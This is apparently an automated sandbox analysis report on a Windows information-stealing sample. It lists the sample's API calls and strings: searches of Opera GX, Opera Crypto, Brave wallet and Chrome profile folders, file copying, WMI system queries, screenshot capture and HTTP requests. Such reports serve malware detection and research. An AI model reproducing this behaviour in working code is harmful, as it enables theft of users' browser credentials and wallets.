FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,0043738C,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Brave, xrefs: 0040A00D
Google Chrome, xrefs: 0040A4B9
\BraveWallet\Preferences, xrefs: 0040A105
Opera GX, xrefs: 00409E8B
Preferences, xrefs: 0040A023

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89

Function 6C7435A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CF688,00001000), ref: 6C7435D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7435E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C7435FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C74363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C74369F
__aulldiv.LIBCMT ref: 6C7436E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C743773
EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C74377E
LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C7437BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C7437C4
EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C7437CB
LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C743801
__aulldiv.LIBCMT ref: 6C743883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C743902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C743918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C74394C

Strings

QPC, xrefs: 6C7438FC
AuthcAMDenti, xrefs: 6C743946
GenuntelineI, xrefs: 6C743639
GTC, xrefs: 6C743912
MOZ_TIMESTAMP_MODE, xrefs: 6C7435DB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 1046dacf06819e22c0b23405e447d134bd53dcc90d3ab03f45cc3cf728388501
Instruction ID: 6e622915d2f07d0ae95690ccccb175004c7357fc3a13d6b7c0930d9ccd21a1ee
Opcode Fuzzy Hash: 1046dacf06819e22c0b23405e447d134bd53dcc90d3ab03f45cc3cf728388501
Instruction Fuzzy Hash: F7B1A571B053129FDB08DF29C94561ABBF9FB8A704F05893EE899E3750D7309A00CB91

Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416018
FindFirstFileA.KERNEL32(?,?), ref: 0041602F
StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
wsprintfA.USER32 ref: 00416091
StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
wsprintfA.USER32 ref: 004160C2
wsprintfA.USER32 ref: 004160D9
PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
lstrcatA.KERNEL32(?), ref: 00416125
lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
lstrcatA.KERNEL32(?,?), ref: 0041614A
lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
lstrcatA.KERNEL32(?,?), ref: 00416170
FindNextFileA.KERNEL32(?,?), ref: 004162FF
FindClose.KERNEL32(?), ref: 00416313

Strings

%s\*, xrefs: 0041600C
%s\%s, xrefs: 0041608B
%s\%s, xrefs: 004160D3

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

ROOT\CIMV2, xrefs: 00411862
WQL, xrefs: 0041189A
InstallDate, xrefs: 004118ED
Unknown, xrefs: 0041196A
Select * From Win32_OperatingSystem, xrefs: 00411895
%d/%d/%d %d:%d:%d, xrefs: 00411943
Unknown, xrefs: 00411971
Unknown, xrefs: 00411985

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

ERROR, xrefs: 00406AB6
ERROR, xrefs: 00406BAB
GET, xrefs: 00406A42

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091
Opera Crypto, xrefs: 0040C09F

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: aa36165faac966798846ca3c9bce9657deccde8570b813cc5940d77252a91f8b
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
